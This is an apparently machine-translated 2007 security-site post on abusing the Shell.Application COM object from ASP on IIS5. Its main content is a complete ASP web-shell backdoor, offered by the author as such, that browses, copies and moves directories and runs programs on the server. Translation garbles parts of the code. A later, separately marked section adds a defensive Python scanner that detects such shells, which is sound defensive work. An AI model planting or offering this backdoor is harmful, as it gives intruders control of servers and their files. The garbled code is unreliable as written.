Description of a vulnerability in the Shell.Application object

ID MYHACK58:62200717438
Type myhack58
Reporter Anonymous
Modified 2007-10-30T00:00:00


Environment: tested successfully on Windows 2000 Server + IIS5 with the default IIS permissions (scripts executable).

Description: on a default Windows 2000 Server, ASP code can call the Server.CreateObject method to use components that are already installed, such as the well-known ADO database controls. Besides these purpose-built components, components originally meant for the system itself, such as WSH and FSO, can be instantiated the same way, and most ASP backdoors today rely on them. Administrators therefore delete or change the component's CLSID value in the registry to disable them, and some uninstall them outright through "Add/Remove Programs" in the Control Panel.

The Shell.Application component I use here, however, is still regarded as a safe server component (or some people simply do not know about it). It is documented in MSDN under the Shell object. This component has nothing to do with WSH or FSO.

What can we do through it? We can browse directories, copy and move directories, and get file sizes. We can also run an existing program (bat, exe, hta), but without being able to pass parameters.

The conditions needed for this to work:

1. We can upload ASP files to a directory where scripts are executable.
2. The permissions on the server's hard disk are the default Everyone: Full Control.
3. The component has not been removed.

Below is the example I wrote; let's just call it a shell backdoor. Even if it does not count as a vulnerability, I think it counts as a new backdoor.

<%response. write "<font size=6 color=red>can only execute one operation:)</font>" %> <%response. write now()%><BR>the procedure where the physical path: <%response. the write request. servervariables("APPL_PHYSICAL_PATH")%> <html> <title>czy's shell. application backdoor </title> <body> <form action="<%= Request. ServerVariables("URL") %>" method="POST"> <input type=text name=text value="<%= szCMD %>"> Enter to browse the directory<br> <input type=text name=text1 value="<%= szCMD1 %>"> copy <input type=text name=text2 value="<%= szCMD2 %>"><br> <input type=text name=text3 value="<%= szCMD3 %>"> the move <input type=text name=text4 value="<%= szCMD4 %>"><br> Path:<input type=text name=text5 value="<%= szCMD5 %>"> Program:<input type=text name=text6 value="<%= szCMD6 %>"><br> <input type=submit name=sb value=Send command> </form> </body> </html> <% szCMD = Request. Form("text") 'directory browsing if (szCMD <> "") then set shell=server. createobject("shell. application") 'build the shell object set fod1=shell. namespace(szcmd) set foditems=fod1. items for each co in foditems response. write "<font color=red>" & amp; co. path &"-----" & amp; co. the size & "</font><br>" next end if %>

<% szCMD1 = Request. Form("text1") 'directory copy, not file copy szCMD2 = Request. Form("text2") if szcmd1<>"" and szcmd2<>"" then set shell1=server. createobject("shell. application") 'build the shell object set fod1=shell1. namespace(szcmd2)

for i=len(szcmd1) to 1 step -1 if mid(szcmd1,i,1)="\" then path=left(szcmd1,i-1) exit for end if next

if len(path)=2 then path=path & "\" path2=right(szcmd1,len(szcmd1)-i) set fod2=shell1. namespace(path) set foditem=fod2. parsename(path2) fod1. copyhere foditem response. write "command completed success!" end if %>

<% szCMD3 = Request. Form("text3") 'the directory move szCMD4 = Request. Form("text4") if szcmd3<>"" and szcmd4<>"" then set shell2=server. createobject("shell. application") 'build the shell object set fod1=shell2. namespace(szcmd4)

for i=len(szcmd3) to 1 step -1 if mid(szcmd3,i,1)="\" then path=left(szcmd3,i-1) exit for end if next

if len(path)=2 then path=path & "\" path2=right(szcmd3,len(szcmd3)-i) set fod2=shell2. namespace(path) set foditem=fod2. parsename(path2) fod1. movehere foditem response. write "command completed success!" end if %> <% szCMD5 = Request. Form("text5") 'execute the program to the specified path szCMD6 = Request. Form("text6") if szcmd5<>"" and szcmd6<>"" then set shell3=server. createobject("shell. application") 'build the shell object shell3. namespace(szcmd5). items. item(szcmd6). invokeverb response. write "command completed success!" end if
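A defensive check that follows from the description above, added here and not part of the original post: a Python scan of ASP source for Server.CreateObject calls that instantiate Shell.Application (or the WSH and FSO components the post mentions), plus the Shell methods the sample calls. The function names and the sample strings are constructed for illustration.

```python
import re

# ProgIDs named on the page: Shell.Application, plus the WSH and FSO
# components administrators already disable.
PROGIDS = ("shell.application", "wscript.shell", "scripting.filesystemobject")
# Shell object methods the page's sample uses to browse, copy, move, execute.
METHODS = ("namespace", "parsename", "copyhere", "movehere", "invokeverb")

CONCAT_RE = re.compile(r'"\s*&\s*"')  # ProgID written in pieces: "Shell." & "Application"
CREATE_RE = re.compile(r'createobject\s*\(\s*"([^"]+)"', re.IGNORECASE)
METHOD_RE = re.compile(r"\.\s*(" + "|".join(METHODS) + r")\b", re.IGNORECASE)


def scan_asp(source):
    """Return sorted (line_no, kind, name) findings for one ASP source text."""
    findings = set()
    for line_no, line in enumerate(source.splitlines(), 1):
        joined = CONCAT_RE.sub("", line)  # rejoin concatenated string literals
        for match in CREATE_RE.finditer(joined):
            progid = re.sub(r"\s+", "", match.group(1)).lower()
            # Accept version-dependent ProgIDs such as "Shell.Application.1".
            if any(progid == p or progid.startswith(p + ".") for p in PROGIDS):
                findings.add((line_no, "createobject", progid))
        for match in METHOD_RE.finditer(line):
            findings.add((line_no, "method", match.group(1).lower()))
    return sorted(findings)


def needs_review(source):
    """True when the file instantiates one of the listed components."""
    return any(kind == "createobject" for _, kind, _ in scan_asp(source))


# Constructed sample inputs (not taken from the page).
SAMPLE_FLAGGED = r'''<%
Set sh = Server.CreateObject("Shell." & "Application")
Set folder = sh.NameSpace("D:\example")
%>'''

SAMPLE_CLEAN = r'''<%
Set conn = Server.CreateObject("ADODB.Connection")
Response.Write Now()
%>'''

if __name__ == "__main__":
    for name, text in (("flagged", SAMPLE_FLAGGED), ("clean", SAMPLE_CLEAN)):
        print(name, needs_review(text), scan_asp(text))
```

A method hit without a matching CreateObject hit is only supporting evidence, since names such as NameSpace can appear in unrelated code.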